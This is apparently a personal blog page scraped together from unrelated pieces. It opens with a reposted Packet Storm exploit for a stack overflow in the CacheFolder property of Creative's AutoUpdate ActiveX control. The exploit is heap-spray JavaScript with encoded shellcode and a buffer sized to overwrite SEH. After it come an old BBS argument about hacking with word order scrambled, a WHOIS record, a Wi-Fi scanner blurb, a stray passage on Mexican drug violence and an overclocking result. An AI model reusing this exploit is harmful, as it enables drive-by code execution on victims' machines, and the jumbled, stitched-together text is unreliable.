Source: http://www.packetstormsecurity.org!!!NOT PRIVATE PLEASE DISTRIBUTE!!!Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital SecurityActiveX Download @ http://www.creative.com/su/Product.aspMAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATIONGreetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Tested On Windows XP SP3 with all patches (like that matters)Products Affected:the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:Sound cardsAudigyAudigy 2Audigy 2 LSAudigy 2 NXAudigy 2 PlatinumAudigy 2 Platinum eXAudigy 2 ValueAudigy 2 ZSAudigy 2 ZS GamerAudigy 2 ZS NotebookAudigy 2 ZS PlatinumAudigy 2 ZS Platinum ProAudigy 2 ZS Video EditorAudigy 4 ProAudigy GamerAudigy LSAudigy MP3+Audigy PlatinumAudigy Platinum eXLive! 24-bitLive! 24-bit ExternalLive! 5.1Live! 5.1 Digital (Dell)Live! ADVANCED MBMP3 +Sound Blaster Audigy 2 ZS Digital AudioSound Blaster Audigy ADVANCED MBSound Blaster X-Fi Fatal1tyWireless MusicX-Fi Elite ProX-Fi PlatinumX-Fi XtremeMusicUSB Sound BlasterAudigy 2 NXMP3 +Portable AudioMuVoMuVo NXMuVo SlimMuVo TXMuVo TX FMMuVo² X-TrainerMuVo²MuVo² FMNOMAD II 32MBNOMAD II MGNOMAD IIcNOMAD Jukebox 3NOMAD Jukebox ZENRhombaPortable Media PlayersZEN Portable Media CenterZEN Vision 30GBMP3 PlayersMuVoMuVo 2.0 / MuVo MixMuVo MicroMuVo NXMuVo SlimMuVo Sport C100MuVo TXMuVo TX FMMuVo V200MuVo² X-TrainerMuVo²MuVo² FMNOMAD II 32MBNOMAD II MGNOMAD II MG Limited EditionNOMAD IIcNOMAD JukeBoxNOMAD Jukebox 10GBNOMAD Jukebox 2NOMAD Jukebox 3NOMAD Jukebox CNOMAD Jukebox ZENNOMAD Jukebox ZEN NXNOMAD Jukebox ZEN USB 2.0RhombaZEN 20GBZEN MicroZEN Nano 512MBZEN Nano PlusZEN Neeon 5GB/6GBZEN Portable Media CenterZEN SleekZEN TouchZEN Vision 30GBZEN XtraWeb CamerasCreative PC-CAM 900Creative WebCam VistaGame StarLive! Ultra for NotebooksPC-CAM 880WebCam InstantWebCam InstantWebCam Live!WebCam Live! ProWebCam Live! UltraWebCam NotebookWebCam NXWebCam NX ProWebCam NX UltraWebCam VistaVideoAudigy 2 ZS Video EditorWirelessWireless MusicNotebook ProductsAudigy 2 NXAudigy 2 ZS NotebookLive! 24-bit ExternalLive! Ultra for NotebooksMP3 +WebCam NotebookSoftwareGame Starhttp://us.creative.com/support/downloads/popup_supportproducts.aspGoogle: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715KILL BIT THIS ^^+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-->

var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");var mainblk = unescape("%u0c0c%u0c0c");var hdr = 20;var slck = hdr + sc01.length;while (mainblk.length < slck) mainblk += mainblk;var fillblk = mainblk.substring(0,slck);var blk = mainblk.substring(0,mainblk.length - slck);while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;var memory = new Array();for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }var buf = '';while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.obj1.cachefolder = buf;

Here is a poorly edited transcript of a conversation i had with someone on a dialup Bulletin Board System many years ago, like probably close to 10 years ago….I came across it today…on some site in russia that appears to be a blogging portal. Awesome…

UPDATE: I’ve attempted to correct some of the editing, a lot of words were reversed…also cleaned up the spacing.

By the way, I believe i was 14 or 15 when i wrote this. I posted it to a dialup BBS from my parents basement back in the early 90’s before i had the internet, How it ended up where it did im not sure…

The other party is never identified.

For the record a Virus is any file that will self propagate.

Also, at the time, I had no traditional ISP, just a phone line And as far as the ‘experience’ i refer to. I didnt have any, nor did i have any compatriots. [I couldnt afford internet, and BBS systems were free and...i had a dialtone alll night :P]

Oh and as for the BIG virus writer i mention. At the time i was particularly interested in the interior workings of the Sub7 and NetBus ‘remote administration suites’ , and had sought them out. [Greets mobman :P]

Towards the second half of the conversation im pretty sure i was irritated at the fact that this guy thinks im some kind of criminal.

And when the other party refers to Denial of Service…having never been on the internet before i actually didnt know what Denial of Service was

Автор: Kurt Wismer / Дата: 11 Sep 00 16:33
—-
VIRUS

-= Nigel Todman wrote to =- All

NT: Hey All, This may seem but unusaul, I’m a hacker that DOESN’T support
*most* viruses. The only viruses that think I are alright, are the
network kind adminstration (A.K.A Backdoor Viruses), When i
DO hack someone, I usually don’t screw up anything at all,
I might do some remote Key-Logging and get some passwords,
then them add to my big list.

in other you words don’t respect other people’s privacy and collect you
information that can be used to services… steal and you seem to be in
(the canada bbs you’re on is in the area)… hamilton-wentworth
did you know that what you is describe illegal in this country? it falls
the under heading of criminal mischeif relating to and data carries a
maximum penalty of ten years imprisonment…
i suggest you seek the advice a of lawyer, mr. nigel todman…
you might like also to know that what you describe also is a breach of
your isp’s terms service of agreement… come to think of it, wonder i
what your sysop gerry schuster would if say he knew what kind of user
were… you

NT: Right now I’ve got 2 viruses, safely disassembled on my computer
but both of them are the kind i don’t like. One is the NWO Trojan, and the
other was made by some Viral Creations Lab or something.
But because I am hacker i always know what’s going on
before all of you other guys.

sure do, you that’s why you’re a) dumb enough call to a trojan a virus,
and b) with play virus construction kit crap…

NT: Hell, know I some of the people that some wrote BIG viruses!

so do i, and ones the i know would be laughing at and you calling you a
’script kiddie’… (a i’m term sure you’ve heard before)

NT: So…what going I’m to most likely do is any, forward potentially DANGEROUS virus
info that come i across on my site surfing this to discussion group,

thats all well fine, and so long as you obey the of rules this echo…

NT: Right now, I don’t hack, I crack progz. From my experience
there are 2 types, maybe 3 type of hackerz, the ones that to want Delete, Destroy and
Infect everything anything and in their paths, that’s not a hacker imo… their more, “Invasion of privacy” type people.

and neither is that…

NT: To me hacking isn’t about filez, it’s about information, K well files ARE
information, but IP Address, passwords, Ports, Transfers, breaching security
measures of any kind is cracking… you crack software, the protection on games,
you crack safes, you crack encryption algorithims, you crack passwords, etc…hacking
is a different beast entirely…DOS MS-DOS),

(not if you mean ‘Denial of Service’ do i’ll you a favour and tell you most
that people who actually know what they’re about talking call it DoS,
not DOS…

NT: of types information. Cuz all you people afraid are to go to Warez sitez…
has occurred it to you that maybe the majority us of simply don’t want
to break the law? so i go to them all the time I’m not infected, Here’s
some Respect for yer fellow hacker Rulez, Hackerz don’t usually write viruses
to infect other hackerz, unless they got some beef with them. Hackerz hack to gain
recognition at Underground the level If you don’t piss a off hacker they usually won’t hack you.
If you act like a dumbass, that ‘em pisses off. In other words “aggressive” hackerz aren’t

real hackers are people who come with up code hacks to solve problems -
thinking you’re of crackers, virus writers, and other folks… similar

NT: Hackerz will always think they know more about what there doing then usually they do.

well that certainly seems to to apply you…

NT: Hackerz are not usually “computer geeks” You won’t be able to at look someone and tell there a hacker.
Hackerz vary in intelligence, some are geniuses, others just have potential to be impressive.
Most NT hackerz are between 15-22 years of age. (From my observations at least.)

well certainly that says it all… you and your are compatriots mostly kids…

NT: K, well I other got things i should be doing right now, like gettin’ off the phone!

i wonder if your parents know what you’re doing…

NT: So if you ever want to know anything from a “non-aggressive/non-virus spreading”
hacker, just get in touch with me….

you mean any if of us ever want to know a what preachy, self-important
script kiddie has to we say, should get in touch with you - will do…

___ MultiMail/MS-DOS v0.27
— Maximus/2 3.01
* Origin: Hippies Leftover (1:250/525)
????????: 1

I remember the system i was probably using to post this was a 486SX2 running at 50MHz, In my earliest dialup adventures i was using a 2400 baud modem but at some point i upgraded to a SupraExpress 56K V90 Modem. So who is Kurt Wismer ? Who owns soft-train.ru ?

Registry Whois
% By submitting a query to RIPN’s Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: SOFT-TRAIN.RU
type: CORPORATE
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED
person: Private person
phone: +7 095 0000000
e-mail:
registrar: REGRU-REG-RIPN
created: 2008.05.07
paid-till: 2009.05.07
source: TC-RIPN

Last updated on 2008.05.28 07:27:37 MSK/MSD

Extended Info

IP Address: 92.241.170.62
Website Status: active
Server Type: nginx/0.5.35
Cache Date: 2008-05-27 21:33:37 MST

As for Kurt, it would appear he is a 32yr old programmer from Toronto I dropped him a line at one of his seemingly numerous online venues directing him here…It would be my bet that he is the other party of that conversation.

Cool beans.

Inssider

Inssider is a Wi-Fi network scanner for Windows Vista and Windows XP. Although NetStumbler, the most popular Wi-Fi network scanner, is free, it hasn’t been actively developed for years. We heard complaints that NetStumbler doesn’t with Windows Vista and 64-bit Windows XP, so we decided to build an open-source Wi-Fi network scanner designed for the current generation of Windows operating system.

Features

• Works with internal Wi-Fi radio
  
• Wi-Fi network information (SSID, MAC, data rate, signal strength, security, etc)
• Graph signal strength over time
• Open source (Apache License, Version 2.0)

Inssider on Vista

This project was started by Charles Putney on The Code Project. Norman Rasmussen modified the project to use the Managed Wi-Fi C# wrapper for the Native Wi-Fi API. Many thanks to Charles and Norman, as well as the Managed Wi-Fi team for getting this project off the ground.

After we had a basic application working we decided we should release it so that everyone else can use it. Inssider is free and open source so that others can join in the fun!

System Requirements

• Windows XP SP2 with .NET 2.0, or Vista
• 1024 x 768 Resolution or Greater

Download: http://www.metageek.net/files/webfm/Software/Inssider_Installer.zip

I’ve taken a quick look at it, when im screwing with wireless next ill be using this program. Thought id spread the word

Yet if prohibitionists should find this lack of results troubling, imagine how Mexico must view it.  That country doesn’t even produce cocaine, but it became a transit route to the U.S.  when enforcers had some success in curtailing supplies coming through the Caribbean in the late 1990s.  That success didn’t change the U.S.  appetite for the mind-altering substances.  Instead, drugs started flowing over land routes and Mexican cartels took charge.
…
…
Still, the escalating violence is troubling.  The official death toll attributable to organized crime since the Calderon crackdown began now stands at 3,995.  Of that, 1,170 have died this year.  Especially alarming are the number of assassinations among military personnel and municipal, state and federal police officers.

Eleven federal law enforcement agents have been killed in ambushes and executions in the last four weeks alone.

ID : 354637

Submitted by Nigel Todman | Thu, 01 May 2008 10:41:21 +0200 | Validated by CPU-Z 1.44.2

RAM : 2048 MB DDR Single Channel
RAM Speed : 226.7 MHz (1:1) @ 3-4-4-8
Slot 2 : 1024MB (PC3200)
Slot 2 Manufacturer : Kingston

w00t

UPDATE:

Alrite. 3.4 GHz was technically stable…but i was experiencing issues with Audio, Intergrated was cracking up. So i bumped it back down to 3.2

Here’s a bunch of screens of my various clocks and scores.